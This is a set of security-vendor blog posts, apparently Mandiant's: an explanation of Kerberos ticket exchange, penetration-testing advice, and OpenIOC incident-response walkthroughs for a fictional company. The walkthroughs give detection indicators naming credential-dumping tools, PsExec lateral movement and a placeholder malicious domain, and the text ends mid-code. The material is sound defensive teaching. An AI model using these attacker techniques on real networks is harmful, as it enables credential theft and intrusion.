There are two main types of Kerberos tickets used in Active Directory: Ticket Granting Tickets (TGTs) and service tickets. Service tickets are obtained from the Ticket Granting Service (TGS). The TGT is used to authenticate the identity of a particular entity in Active Directory, such as a user account. Service tickets are used to authenticate a user to a specific service hosted on a domain-joined system. A valid TGT can be used to request service tickets from the Key Distribution Center (KDC). In Active Directory environments, the KDC is hosted on a Domain Controller.

When the user wants to authenticate to the remote file share, Windows first checks if a valid TGT is present in memory on the user's workstation. If a TGT isn't present, a new TGT is requested from the Domain Controller in the form of an AS-REQ request. To prevent password cracking attacks (AS-REP Roasting), by default, Kerberos Preauthentication is performed first. Windows creates a timestamp and encrypts the timestamp with the user's Kerberos key (Note: User Kerberos keys vary based on encryption type. In the case of RC4 encryption, the user's RC4 Kerberos key is directly derived from the user's account password. In the case of AES encryption, the user's Kerberos key is derived from the user's password and a salt based on the username and domain name). The domain controller receives the request and decrypts the timestamp by looking up the user's Kerberos key. An example AS-REQ packet is shown in Figure 5.

Figure 5: AS-REQ
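The note above about key derivation can be made concrete. For the RC4 case, the user's Kerberos key is simply the MD4 hash of the UTF-16LE-encoded password, i.e. the NT hash. A standard-library sketch with an illustrative password (MD4 availability depends on the local OpenSSL build):

```python
import hashlib

password = "Password123!"  # illustrative value only

# RC4 case: the Kerberos key is the NT hash, i.e. MD4(UTF-16LE(password)).
# Note: MD4 may be unavailable if the local OpenSSL build disables legacy digests.
rc4_key = hashlib.new("md4", password.encode("utf-16-le")).hexdigest()
print(rc4_key)

# AES case: the key is derived from the password plus a salt; for AD user
# accounts the salt is conventionally the uppercase realm concatenated with
# the username (e.g. "ACMENET.CORPsa_jsmith"), run through PBKDF2 (RFC 3962).
```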

Once preauthentication is successful, the Domain Controller issues an AS-REP response packet that contains various metadata fields, the TGT itself, and an "Authenticator". The data within the TGT itself is considered sensitive. If a user could freely modify the content within the TGT, they could impersonate any user in the domain as performed in the Golden Ticket attack. To prevent this from easily occurring, the TGT is encrypted with the long term Kerberos key stored on the Domain Controller. This key is derived from the password of the krbtgt account in Active Directory.

To prevent users from impersonating another user with a stolen TGT blob, Active Directory’s Kerberos implementation uses session keys that are used for mutual authentication between the user, domain, and service. When the TGT is requested, the Domain Controller generates a session key and places it in two places: the TGT itself (which is encrypted with the krbtgt key and unreadable by the end user), and in a separate structure called the Authenticator. The Domain Controller encrypts the Authenticator with the user's personal Kerberos key.

When Windows receives the AS-REP packet back from the domain controller, it caches the TGT ticket data itself into memory. It also decrypts the Authenticator with the user's Kerberos key and obtains a copy of the session key generated by the Domain Controller. Windows stores this session key in memory for future use. At this point, the user's system has a valid TGT that it can use to request service tickets from the domain controller. An example AS-REP packet is shown in Figure 6.

Figure 6: AS-REP

After obtaining a valid TGT for the user, Windows requests a service ticket for the file share service hosted on the remote system SQLSERVER.ACMENET.CORP. The request is made using the service's Service Principal Name (“SPN”). In this case, the SPN would be cifs/SQLSERVER.ACMENET.CORP. Windows builds the service ticket request in a TGS-REQ packet. Within the TGS-REQ packet, Windows places a copy of the TGT previously obtained from the Domain Controller. This time, the Authenticator is encrypted with the TGT session key previously obtained from the domain controller. An example TGS-REQ packet is shown in Figure 7.

Figure 7: TGS-REQ

Once the Domain Controller receives the TGS-REQ packet, it extracts the TGT from the request and decrypts it with the krbtgt Kerberos key. The Domain Controller verifies that the TGT is valid and extracts the session key field from the TGT. The Domain Controller then attempts to decrypt the Authenticator in the TGS-REQ packet with the session key. Once decrypted, the Domain Controller examines the Authenticator and verifies the contents. If this operation succeeds, the user is considered authenticated by the Domain Controller and the requested service ticket is created.

The Domain Controller generates the service ticket requested for cifs/SQLSERVER.ACMENET.CORP. The data within the service ticket is also considered sensitive. If a user could manipulate the service ticket data, they could impersonate any user on the domain to the service as performed in the Silver Ticket attack. To prevent this from easily happening, the Domain Controller encrypts the service ticket with the Kerberos key of the computer the user is authenticating to. All domain-joined computers in Active Directory possess a randomly generated computer account credential that both the computer and Domain Controller are aware of. The Domain Controller also generates a second session key specific to the service ticket and places a copy in both the encrypted service ticket and a new Authenticator structure. This Authenticator is encrypted with the first session key (the TGT session key). The service ticket, Authenticator, and metadata are bundled in a TGS-REP packet and forwarded back to the user. An example TGS-REP packet is shown in Figure 8.

Figure 8: TGS-REP

Once Windows receives the TGS-REP for cifs/SQLSERVER.ACMENET.CORP, Windows extracts the service ticket from the packet and caches it into memory. It also decrypts the Authenticator with the TGT specific session key to obtain the new service specific session key. Using both pieces of information, it is now possible for the user to authenticate to the remote file share. Windows negotiates a SMB connection with SQLSERVER.ACMENET.CORP. It places a Kerberos blob in an "ap-req" structure. This Kerberos blob includes the service ticket received from the domain controller, a new Authenticator structure, and metadata. The new Authenticator is encrypted with the service specific session key that was previously obtained from the Domain Controller. The authentication process is shown in Figure 9.

Figure 9: Authenticating to SMB (AP-REQ)

Once the file share server receives the authentication request, it first extracts and decrypts the service ticket from the Kerberos authentication blob and verifies the data within. It also extracts the service specific session key from the service ticket and attempts to decrypt the Authenticator with it. If this operation succeeds, the user is considered to be authenticated to the service. The server will acknowledge the successful authentication by sending one final Authenticator back to the user, encrypted with the service specific session key. This action completes the mutual authentication process. The response (contained within an “ap-rep” structure) is shown in Figure 10.

Figure 10: Final Authenticator (Mutual Authentication, AP-REP)

A diagram of the authentication flow is shown in Figure 11.

Figure 11: Example Kerberos authentication flow

New Tactics. New Motives. New Services.

Every day at Mandiant we respond to some of the largest cyber security incidents around the world. This gives us a front-row seat to witness what works (and what doesn't) when it comes to finding attackers and preventing them from stealing our clients' data.

Attackers' tactics and motives are evolving and as a result our security strategies also need to adapt. Today, we announced two new service offerings that will further help our clients improve their protective, detective, and responsive security controls and leverage Mandiant's extensive experience responding to some of the most serious cyber security incidents.

Our first new service offering addresses attackers' expanding motives. We are starting to see attackers with destructive motives, and what could be more damaging than attacking a nation's critical infrastructure? Security incidents at critical infrastructure such as electric power grids, utilities and manufacturing companies can affect the lives of hundreds of thousands of people. Our new Industrial Control Systems (ICS) Security Gap Assessment is specifically focused on helping these industries - and others that use SCADA systems - to assess their existing security processes for industrial control systems. The service helps identify security gaps and provides specific recommendations to close those gaps and safeguard critical infrastructure.

Our second new service offering is designed to help organizations address the challenges they face as they build out their own internal security operations program and incident response teams. Many organizations want to enhance their internal capabilities beyond the traditional security operations center (SOC). Our new Cyber Defense Center Development service helps organizations evolve their internal SOC by improving the visibility (monitoring and detection) and response capabilities (incident response) necessary to defend against advanced threats. This service looks at existing people, processes, and technologies and identifies areas for improvement. It helps companies identify and prioritize the alerts that require the most immediate action, with the goal of reducing the mean time to remediation.

If either of these new services sounds like something that could help your organization, let us know.

The Five W’s of Penetration Testing

Often in discussions with customers and potential customers, questions arise about our penetration testing services, as well as penetration testing in general. In this post, we want to walk through Mandiant's take on the five W's of penetration testing, in hopes of helping those of you who may have some of these same questions. For clarity, we are going to walk through these W's in a non-traditional order.

Why

First and foremost, it's important to be upfront with yourself with why you are having a penetration test performed (or at least considering one). If your organization's primary motivation is compliance and needing to "check the box," then be on the lookout for your people attempting to subtly (or not so subtly) hinder the test in order to earn an "easy pass" by minimizing the number of findings (and therefore the amount of potential remediation work required). Individuals could attempt to hinder a penetration test by placing undue restrictions on the scope of systems assessed, the types of tools that can be used, or the timing of the test.

Even if compliance is a motivating factor, we hope you're able to take advantage of the opportunity penetration testing provides to determine where vulnerabilities lie and make your systems more secure. That is the real value that penetration testing can provide.

Finally, if you are getting a penetration test to comply with requirements imposed on your organization, that will often drive some of the answers to later questions about the type and scope of the test. Keep in mind that standards only dictate minimum requirements, however, so you should also consider additional penetration testing activities beyond the "bare minimum."

Who

There are really two "who" questions to consider, but for now we will just deal with the first: Who are the attackers that concern you? Are they:

  1. Random individuals on the Internet?
  2. Specific threat actors, such as state-sponsored attackers, organized criminals, or hacktivist groups?
  3. An individual or malware that is behind the firewall and on your internal corporate network?
  4. Your own employees ("insider threats")?
  5. Your customers (or attackers who may compromise customers' systems/accounts)?
  6. Your vendors, service providers, and other business partners (or attackers who may have compromised their systems)?

The answer to this will help drive the type of testing to be performed and the types of test user accounts (if any) to provision. The next section will describe some possible penetration test types, but it's helpful to also discuss the types of attackers you would like the penetration test to simulate.

What

What type of penetration test do you want performed? For organizations new to penetration testing, we recommend starting with an external network penetration test, which will assess your Internet-accessible systems in the same way that an attacker anywhere in the world could access them. Beyond that, there are several options:

  1. Internal network penetration test - A penetration test of your internal corporate network. Typically we start these types of assessments with only a network connection on the corporate networks, but a common variant is what we call an "Insider Threat Assessment," where we start with one of your standard workstations and a standard user account.
  2. Web application security assessment - A review of custom web application code for security vulnerabilities such as access control issues, SQL injection, cross-site scripting (XSS) and others. These are best done in a test or development environment to minimize impact to the production environment.
  3. Social engineering - Using deceptive email, phone calls, and/or physical entry to gain access to systems.
  4. Wireless penetration test - A detailed security assessment of wireless network(s) at one or more of your locations. This typically includes a survey of the location looking for unauthorized ("rogue") wireless access points that have been connected to the corporate network and are often insecurely configured.

If budgets were not an issue, you would want to do all of the above, but in reality you will need to prioritize your efforts on what makes sense for your organization. Keep in mind that the best approach may change over time as your organization matures.

Where

In what physical location should the test take place? Many types of penetration testing can be done remotely, but some require the testers to visit your facility. Physical social engineering engagements and wireless assessments clearly need to be performed at one (or more) of your locations.

Some internal penetration tests can be done remotely via a VPN connection, but we recommend conducting them at your location whenever possible. If your internal network has segmentation in place (as we recommend), then you should work with your penetration testing organization to determine the best physical location for the test to be performed. Generally, you'll want to do the internal penetration test from a network segment that has broad access to other portions of the internal network in order to get the best coverage from the test.

Another "Where" to consider for remote testing is where the testers are physically located. When testers are in a different country than you, legal issues can arise with data provisioning and accessibility. Differences in language, culture, and time zones could also make coordination and interpretation of results more difficult.

When

We recommend that most organizations get some sort of security assessment on an annual basis, but that security assessment does not necessarily need to be a penetration test (see Penetration Testing Has Come Of Age - How to Take Your Security Program to the Next Level). Larger organizations may have multiple assessments per year, each focused in a different area.

Within the year, the timing of the penetration test is usually pretty flexible. You will want to make sure that the right people from your organization are available to initiate and manage the test - and to receive results and begin implementing changes. Based on your organization's change control procedures, you may need to work around system freezes or other activities. Testing in December can be difficult due to holidays and vacation, along with year-end closeout activities, especially for organizations in retail, e-commerce, and payment processing.

If you have significant upgrades planned for the systems that will be tested, it is typically best to schedule the test for a month or two after the upgrades are due to be finished. This will allow some time for the inevitable delays in deploying the upgrades, as well as give the upgraded systems (and their administrators) a bit of time to "settle in" and get fully configured before being tested.

Who (part 2)

The other "who" question to consider is who will perform the penetration test? We recommend considering the following when selecting a penetration testing provider:

  1. What are the qualifications of the organization and the individuals who will be performing the test? What differentiates them from other providers?
  2. To what degree does their testing rely on automated vulnerability scanners vs. hands on manual testing?
  3. How well do they understand the threat actors that are relevant to your environment? How well are they able to emulate real world attacks?
  4. What deliverables will you receive from the test? Are they primarily the output of an automated tool? Ask for samples.
  5. Are they unbiased? Do they use penetration tests as a means to sell or resell other products and services?

No doubt, there are other questions that you will want to consider when scoping a penetration test, but we hope that these will help you get started. If you'd like to read more about Mandiant's penetration testing (and other) services, you can do so here. Of course, also feel free to contact us if you'd like to talk about your situation and how Mandiant can best assess your organization's security.

Investigating with Indicators of Compromise (IOCs) – Part II

Written by Will Gibb & Devon Kerr

In our blog post "Investigating with Indicators of Compromise (IOCs) - Part I," we presented a scenario involving the "Acme Widgets Co.," a company investigating an intrusion, and its incident responder, John. John's next objective is to examine the system "ACMWH-KIOSK" for evidence of attacker activity. Using the IOCs containing the tactics, techniques and procedures (TTPs) he developed during the analysis of "ACM-BOBBO," John identifies the following IOC hits:

Table 1: IOC hit summary

After reviewing IOC hits in Redline™, John performs Live Response analysis and puts together the following timeline of suspicious activity on "ACMWH-KIOSK".

Table 2: Summary of significant artifacts

John examines the timeline and surmises the following chain of activity:

  • On October 15, 2013, at approximately 16:17:56 UTC, the attacker performed a type 3 network logon, described here, to "ACMWH-KIOSK" from "ACM-BOBBO" using the ACME domain service account, "backupDaily."
  • A few seconds later, the attacker copied two executables, "acmCleanup.exe" and "msspcheck.exe," from "ACM-BOBBO" to "C:\$RECYCLE.BIN."

By generating MD5 hashes of both files, John determines that "acmCleanup.exe" is identical to the similarly named file on "ACM-BOBBO," which means it won't require malware analysis. Since the MD5 hash of "msspcheck.exe" was not previously identified, John sends the binary to a malware analyst, whose analysis reveals that "msspcheck.exe" is a variant of the "acmCleanup.exe" malware.
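Computing the hashes is straightforward. A standard-library Python sketch; chunked reads keep memory use flat on large binaries:

```python
import hashlib

def md5sum(path, chunk_size=1024 * 1024):
    """Return the MD5 hex digest of a file, reading it in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()

# Identical hashes mean the copied file needs no separate malware analysis
print(md5sum(r"C:\$RECYCLE.BIN\acmCleanup.exe"))
print(md5sum(r"C:\$RECYCLE.BIN\msspcheck.exe"))
```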

  • About a minute later, at 16:19:02 UTC, the attacker executed the Sysinternals PsExec remote command execution utility, which ran for approximately three minutes.
  • During this time period, event logs recorded the start and stop of the "WCE SERVICE" service, which corresponds to the execution of the Windows Credentials Editor (WCE).

John can assume PsExec was used to execute WCE, which is reasonable given the timeline of events and artifacts present on the system.

About seven minutes later, the registry recorded the modification of a Run key associated with persistence for "msspcheck.exe." Finally, at 16:48:11 UTC, the attacker logged off from "ACMWH-KIOSK".

John found no additional evidence of compromise. Since the IOCs are living documents, John's next step is to update his IOCs with relevant findings from his investigation of the kiosk system. John updates the "acmCleanup.exe (BACKDOOR)" IOC with information from the "msspcheck.exe" variant of the attacker's backdoor including:

  • File metadata like filename and MD5.
  • A uniquely named process handle discovered by John's malware analyst.
  • A prefetch entry for the "msspcheck.exe" binary.
  • Registry artifacts associated with persistence of "msspcheck.exe."

From there, John double-checks the uniqueness of the additional filename with some search engine queries. He can confirm that "msspcheck.exe" is a unique filename and update his "acmCleanup.exe (BACKDOOR)" IOC. By updating his existing IOC, John ensures that he will be able to identify evidence attributed to this specific variant of the backdoor.

Changes to the original IOC have been indicated in green.

The updated IOC can be seen below:

Figure 1: Augmented IOC for acmCleanup.exe (BACKDOOR)

John needs additional information before he can start to act. He knows two things about the attacker that might be able to help him out:

  • The attacker is using a domain service account to perform network logons.
  • The attacker has been using WCE to obtain credentials and the "WCE SERVICE" service appears in event logs.

John turns to his security information and event management (SIEM) system, which aggregates logs from his domain controllers, enterprise antivirus and intrusion detection systems. A search for type 3 network logons using the "backupDaily" domain account turns up 23 different systems accessed with that account. John runs another query for the "WCE SERVICE" and sees that logs from three domain controllers contain that service event. John now needs to look for IOCs across all Acme machines in a short period of time.
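Those two queries can also be expressed against exported log data. A sketch, assuming Windows Security and System events have been exported as JSON lines; the file name and field names are illustrative:

```python
import json

def summarize(log_path):
    """Tally backupDaily network logons (EID 4624, type 3) and
    WCE SERVICE installs (EID 7045) from exported events."""
    logon_systems = set()
    wce_hosts = set()
    with open(log_path) as f:
        for line in f:
            event = json.loads(line)
            if (event.get("EventID") == 4624 and event.get("LogonType") == 3
                    and event.get("TargetUserName", "").lower() == "backupdaily"):
                logon_systems.add(event.get("Computer"))
            if event.get("EventID") == 7045 and event.get("ServiceName") == "WCE SERVICE":
                wce_hosts.add(event.get("Computer"))
    return logon_systems, wce_hosts

logon_systems, wce_hosts = summarize("exported_events.jsonl")
print(f"{len(logon_systems)} systems accessed with backupDaily")
print(f"WCE SERVICE installed on: {sorted(wce_hosts)}")
```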

Leveraging the Power of Solutions and Intelligence

Welcome to my first post as a FireEye™ employee! Many of you have asked me what I think of FireEye's acquisition of Mandiant. One of the aspects of the new company that I find most exciting is our increased threat intelligence capabilities. This post will briefly explore what that means for our customers, prospects, and the public.

By itself, Mandiant generates threat intelligence in a fairly unique manner from three primary sources. First, our professional services division learns about adversary tools, tactics, and procedures (TTPs) by assisting intrusion victims. This "boots on the ground" offering is unlike any other, in terms of efficiency (a small number of personnel required), speed (days or weeks onsite, instead of weeks or months), and effectiveness (we know how to remove advanced foes). By having consultants inside a dozen or more leading organizations every week of the year, Mandiant gains front-line experience of cutting-edge intrusion activity. Second, the Managed Defense™ division operates our software and provides complementary services on a multi-year subscription basis. This team develops long-term counter-intrusion experience by constantly assisting another set of customers in a managed security services model. Finally, Mandiant's intelligence team acquires data from a variety of sources, fusing it with information from professional services and managed defense. The output of all this work includes deliverables such as the annual M-Trends report and last year's APT1 document, both of which are free to the public. Mandiant customers have access to more intelligence through our software and services.

As a security software company, FireEye deploys powerful appliances into customer environments to inspect and (if so desired) quarantine malicious content. Most customers choose to benefit from the cloud features of the FireEye product suite. This decision enables community self-defense and exposes a rich collection of the world's worst malware. As millions more instances of FireEye's MVX technology expand to mobile, cloud and data center environments, all of us benefit in terms of protection and visibility. Furthermore, FireEye's own threat intelligence and services components generate knowledge based on their visibility into adversary software and activity. Recent examples include breaking news on Android malware, identifying Yahoo! systems serving malware, and exploring "cyber arms" dealers. Like Mandiant, FireEye's customers benefit from intelligence embedded into the MVX platforms.

Many have looked at the Mandiant and FireEye combination from the perspective of software and services. While these are important, both ultimately depend on access to the best threat intelligence available. As a combined entity, FireEye can draw upon nearly 2,000 employees in 40 countries, with a staff of security consultants, analysts, engineers, and experts not found in any other private organization. Stay tuned to the FireEye and Mandiant blogs as we work to provide an integrated view of adversary activity throughout 2014.

I hope you can attend the FireEye + Mandiant - 4 Key Steps to Continuous Threat Protection webinar on Wednesday, Jan. 29 at 2 p.m. ET. During the webinar, Manish Gupta, FireEye SVP of Products, and Dave Merkel, Mandiant CTO and VP of Products, will discuss why traditional IT security defenses are no longer the safeguards they once were and what's now needed to protect against today's advanced threats.

Best of the Best in 2013: The Armory

Everyone likes something for free. And there is no better place to go to get free analysis, intelligence and tools than The Armory on M-Unition. During the past year, we've offered intelligence and analysis on new threat activity, sponsored open source projects and offered insight on free tools like Redline™, all of which has been highlighted on our blog.

In case you've missed it, here are some of our most popular posts:

Challenges in Malware and Intelligence Analysis: Similar Network Protocols, Different Backdoors and Threat Groups

In this post, Mandiant's intel team shares insight on threat activity: specifically, two separate APT groups using two different backdoors that had very similar networking protocols. Read more to learn what they found.

New Release: OWASP Broken Web Applications Project VM Version 1.1

Chuck Willis overviews version 1.1 of the Mandiant-sponsored OWASP Broken Web Applications Project Virtual Machine (VM). If you are not familiar with this open source project, it provides a freely downloadable VM containing more than 30 web applications with known or intentional security vulnerabilities. Many people use the VM for training or self-study to learn about web application security vulnerabilities, including how to find them, exploit them, and fix them. It can also be used for other purposes such as testing web application assessment tools and techniques or understanding evidence of web application attacks.

Back to Basics Series: OpenIOC

Will Gibb and a few of his colleagues at Mandiant embark on a series going back to the basics and looking deeper at OpenIOC: how we got where we are today, how to make and use IOCs, and the future of OpenIOC.

Check out related posts here: The History of OpenIOC, Back to the Basics, OpenIOC, IOC Writer and Other Free Tools.

Live from Black Hat 2013: Redline, Turbo Talk, and Arsenal

Sitting poolside at Black Hat USA 2013, Mandiant's Kristen Cooper chats with Ted Wilson about Redline in this latest podcast. Ted leads the development of Redline where he provides innovative investigative features and capabilities enabling both the seasoned investigator and those with considerably less experience to answer the question, "have you been compromised?"

Utilities Industry in the Cyber Targeting Scope

Our intel team is back again, this time with an eye on the utilities industry. As part of our incident response and managed defense work, Mandiant has observed Chinese APT groups exploiting the computer networks of U.S. utilities enterprises servicing or providing electric power to U.S. consumers, industry, and government. The most likely targets for data theft in this industry include smart grid technologies, water and waste management expertise, and negotiations information related to existing or pending deals involving Western utilities companies operating in China.

OpenIOC Series: Investigating with Indicators of Compromise (IOCs) – Part I

Written by Devon Kerr & Will Gibb

The Back to Basics: OpenIOC blog series previously discussed how Indicators of Compromise (IOCs) can be used to codify information about malware or utilities and describe an attacker's methodology. Also touched on were the parts of an IOC, such as the metadata, references, and definition sections. This blog post will focus on writing IOCs by providing a common investigation scenario, following along with an incident response team as they investigate a compromise and assemble IOCs.

Our scenario involves a fictional organization, "Acme Widgets Co.", which designs, manufactures and distributes widgets. Last week, this organization held a mandatory security-awareness training that provided attendees with an overview of common security topics including password strength, safe browsing habits, email phishing and the risks of social media. During the section on phishing, one employee expressed concern that he may have been phished recently. Bob Bobson, an administrator, indicated that some time back he'd received a strange email about a competitor's widget and was surprised that the PDF attachment wouldn't open. A member of the security operations staff, John Johnson, was present during the seminar and quickly initiated an investigation of Bob's system using the Mandiant Redline™ host investigation tool. John used Redline to create a portable collector configured to obtain live response data from Bob's system, including file system metadata, the contents of the registry, event logs, web browser history, and service information.

John ran the collector on Bob's system and brought the data back to his analysis workstation for review. Through discussions with Bob, John learned that the suspicious e-mail likely arrived on October 13, 2013.

After initial review of the evidence, John assembled the following timeline of suspicious activity on the system.

Table 1: Summary of significant artifacts

Based on this analysis, John pieced together a preliminary narrative: The attacker sent a spear-phishing email to Bob which contained a malicious PDF attachment, "Ultrawidget.pdf", which Bob saved to the desktop on October 10, 2013, at 20:19:07 UTC. Approximately five minutes later, at 20:24:44 UTC, the file "C:\WINDOWS\SysWOW64\acmCleanup.exe" was created, as well as a Run key used for persistence. These events were likely the result of Bob opening the PDF. John sent the PDF to a malware analyst to determine the nature of the exploit used to infect Bob's PC.

The first IOC John writes describes the malware identified on Bob's PC, "acmCleanup.exe", as well as the malicious PDF. IOCs sometimes start out as rudimentary - looking for the known file hashes, filenames and persistence mechanisms of the malware identified. Here is what an initial IOC looks like:

Figure 1: Initial IOC for acmCleanup.exe (BACKDOOR)

As analysis continues, these IOCs are updated and improved - incorporating indicator terms from malware and intelligence analysis as well as being refined based on the environment. In this sense, the IOC is a living document. For example, additional analysis may reveal more registry key information, additional files which may be written to disk, or information for identifying the malware in memory. Here is the same IOC, after augmenting it with the results of malware analysis:

Figure 2: Augmented IOC for acmCleanup.exe (BACKDOOR)

The augmented IOC will continue to identify the exact malware discovered on Bob's PC. This improved IOC will also identify malware which has things in common with that backdoor:

  • Malware which uses the same Mutex, a process attribute that will prevent the machine from being infected multiple times with the same backdoor
  • Malware which performs DNS queries for the malicious domain "23vsx.evil.com"
  • Malware which has a specific set of import functions; in this case which correspond to reverse shell and keylogger functionality

Beginning on October 11, the attacker accessed the system and executed the Windows command "ipconfig" at 20:24:00 UTC, resulting in the creation of a prefetch file. Approximately five minutes later, the attacker began uploading files to "C:\$RECYCLE.BIN". Based on a review of their MD5 hashes, three files ("wce.exe", "getlsasrvaddr.exe", "update.exe") were identified as known credential dumping utilities, while others ("filewalk32.exe", "rar.exe") were tools for performing file system searches and creating WinRAR archives. These items should be recorded in an IOC as a representation of an attacker's tools, techniques and procedures (TTPs). It is important to know that an attacker is likely to have interacted with many more systems than were infected with malware; for this reason it is crucial to look for evidence that an attacker has accessed systems. Some of the most common activities attackers perform on these systems include password dumping, reconnaissance and data theft.

Seeing that the attacker had staged file archives and utilities in the "$Recycle.Bin" folder, John also created an IOC to find artifacts present there. This IOC was designed to identify files in the root of the "$Recycle.Bin" directory, or to identify whether a user (notably, the attacker) tried to access the "$Recycle.Bin" folder by manually typing it into the address bar of Explorer, by checking TypedPaths in the registry. This is an example of encapsulating an attacker's TTPs in OpenIOC form.
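On a live Windows host, the TypedPaths check can also be scripted directly. A Python sketch using the standard library's winreg module; the key path is Explorer's standard per-user location:

```python
import winreg

# Paths typed manually into the Explorer address bar are recorded per-user here
KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths"

with winreg.OpenKey(winreg.HKEY_CURRENT_USER, KEY) as key:
    index = 0
    while True:
        try:
            name, value, _ = winreg.EnumValue(key, index)
        except OSError:
            break  # no more values
        # Manual navigation to $Recycle.Bin is rare for legitimate users
        if "recycle" in str(value).lower():
            print(f"Suspicious typed path: {name} = {value}")
        index += 1
```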

Figure 3: IOC for Unusual Files in "C:\RECYCLER" and "C:\$RECYCLE.BIN" (Methodology)

On October 15, 2013, at 12:15:37 UTC, the Sysinternals PsExec utility was created in "C:\$RECYCLE.BIN". Approximately four hours later, at 16:11:03 UTC, the attacker used the Internet Explorer browser to access text files located in "C:\$RECYCLE.BIN". Between 16:11:03 UTC and 16:11:06 UTC, the attacker accessed two text files which were no longer present on the system. At 16:17:55 UTC, the attacker mounted the remote hidden share "\\10.20.30.101\C$". At 16:20:29 UTC, the attacker executed the Windows "tree" command, which produces a file system listing, resulting in the creation of a prefetch file. At 17:37:37 UTC, the attacker created one WinRAR archive, "C:\$Recycle.Bin\a.rar", which contained two text files, "c.txt" and "a.txt". These text files contained output from the Windows "tree" and "ipconfig" commands. No further evidence was present on the system. John noted that the earliest event log entries present on the system start approximately two minutes after the creation of "a.rar". It is likely that the attacker cleared the event logs before disconnecting from the system.

John identified the lateral movement from "ACM-BOBBO" to the 10.20.30.101 host through registry keys that recorded the mounting of the hidden C$ share. By recording this type of artifact in an IOC, John will be able to quickly see whether the attacker has pivoted to another part of the Acme Widgets Co. network when investigating 10.20.30.101. He included artifacts looking for other common hidden shares such as IPC$ and ADMIN$. The effectiveness of an IOC may be influenced by the environment the IOC was created for. This IOC, for example, may generate a significant number of false positives in an environment where these hidden shares are legitimately used. At Acme Widgets Co., however, the use of hidden shares is considered highly suspicious.

Figure 4: IOC for Lateral Movement (Methodology)

At the end of the day, John authored three new IOCs based on his current investigation. He knows that if he records the artifacts he identified from his investigation into the "ACM-BOBBO" system, he can apply that knowledge to the investigation of the host at 10.20.30.101. Once he collects information on 10.20.30.101 with his Redline portable collector, he'll be able to match IOCs against the Live Response data, which will let him identify known artifacts quickly prior to beginning Live Response analysis. Although John is using these IOCs to search systems individually, these same IOCs could be used to search for evidence of attacker activity across the enterprise. Armed with this set of IOCs, John sets out to hunt for evil on the host at "10.20.30.101".

Stay tuned for our next blog post to see how this investigation develops.

Critical Infrastructure Beyond the Power Grid

The term "critical infrastructure" has earned its spot on the board of our ongoing game of cyber bingo--right next to "Digital Pearl Harbor," "Cyber 9/11," "SCADA" and "Stuxnet."

With "critical infrastructure" thrown about in references to cyber threats nearly every week, we thought it was time for a closer look at just what the term means-and what it means to other cyber threat actors.

The term "critical infrastructure" conjures up images of highways, electrical grids, pipelines, government facilities and utilities. But the U.S. government definition also includes economic security and public health. The Department of Homeland Security defines critical infrastructure as "Systems and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters."[1]

Certainly the U.S. definition is expansive, but some key cyber actors go a step further to include a more abstract "information" asset. Russian officials view information content, flow and influencers as an enormous component of critical infrastructure. Iran and China similarly privilege the security of their information assets in order to protect their governments.

The bottom line?

U.S. companies that may never have considered themselves plausible targets for cyber threats could become victims of offensive or defensive state cyber operations. Earlier this year, several media outlets, including the New York Times and the Washington Post, disclosed that they had been the victims of China-based intrusions. The Times and the Post linked the intrusions on their networks to their reporting on corruption in the upper echelons of the Chinese Communist Party and other issues.

These media outlets weren't sitting on plans for a new fighter jet or cutting-edge wind turbines, the kind of information often assumed to be at risk for data theft. Rather, the reporters at the Times and the Post were perched in key positions to influence U.S. government and public views of the Chinese leadership, possibly in a negative light. The Chinese government had conducted these intrusions against what it deemed critical infrastructure that supported the flow of valuable information.

Who's up next?

State actors motivated to target critical infrastructure (by their own definition or the U.S.') won't just be the usual attention grabbers in cyberspace. We estimate that Iran, Syria, and North Korea all have the interest and would be able to conduct or direct some level of network operations. These states are also likely to conduct operations in the near term to identify red lines and gauge corporate and government reactions. With little reputational loss at stake, we expect actors sponsored by or associated with these states to target an array of critical infrastructure targets. Companies that serve as key information brokers, whether for the public or the U.S. government, should be particularly attuned to the criticality that a variety of cyber threat actors may assign to their work.

OpenIOC: Back to the Basics

Written by Will Gibb & Devon Kerr

One challenge investigators face during incident response is finding a way to organize information about an attacker's activity, utilities, malware, and other indicators of compromise (IOCs). The OpenIOC format addresses this challenge head-on. OpenIOC provides a standard format and terms for describing the artifacts encountered during the course of an investigation. In this post we're going to provide a high-level overview of IOCs, including IOC use cases, the structure of an IOC and IOC logic.

Before we continue, it's important to mention that IOCs are not signatures, and they aren't meant to function as a signature would. This point is often understated: an IOC is meant to be used in combination with human intelligence. IOCs are designed to aid in your investigation, or the investigations of others with whom you share threat intelligence.

IOC Use Cases:

There are several use cases for codifying your IOCs, and these typically revolve around your objectives as an investigator. The number of potential use cases is quite large, and we've listed some of the most common use cases below:

  • Find malware/utility: This is the most common use case. Essentially, this is an IOC written to find some type of known malware or utility, either by looking for attributes of the binary itself or for some artifact created upon execution, such as a prefetch file or registry key.
  • Methodology: Unlike an IOC written to identify malware or utilities, these IOCs find things you don't necessarily know about, in order to generate investigative leads. For example, if you wanted to identify any service DLL that wasn't signed and was loaded from any directory that did not include the path "windows\system32", you could write an IOC to describe that condition. Another good example of a methodology IOC is one that looks at the Registry text value of all "Run" keys for a string ending in ".jpg". This represents an abnormal condition which, upon investigation, may lead to evidence of a compromise.
  • Bulk: You may already be using this kind of IOC. Many organizations subscribe to threat intelligence feeds that deliver a list of MD5s or IP addresses; a bulk IOC can represent a collection of those indicators. These kinds of IOCs are very black and white and are typically only good for an exact match (see the sketch following this list).
  • Investigative: As you investigate systems in an environment and identify evidence of malicious activity such as metadata related to the installation of backdoors, execution of tools, or files being staged for theft, you can track that information in an IOC. These IOCs are similar to bulk IOCs; however, an investigative IOC only contains indicators from a single investigation. Using this type of IOC can help you to prioritize which systems you want to analyze.
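
To make "exact match" concrete, here is a minimal Python sketch that hashes files under a directory and compares them against a bulk list of MD5s. The hash and path are placeholders rather than real intelligence, and in practice a tool such as Redline or MIR would perform this evaluation:

import hashlib
from pathlib import Path

# Placeholder value; a real bulk IOC would carry hashes from a threat feed.
KNOWN_BAD_MD5 = {"0cc175b9c0f1b6a831c399e269772661"}

def md5_of(path):
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

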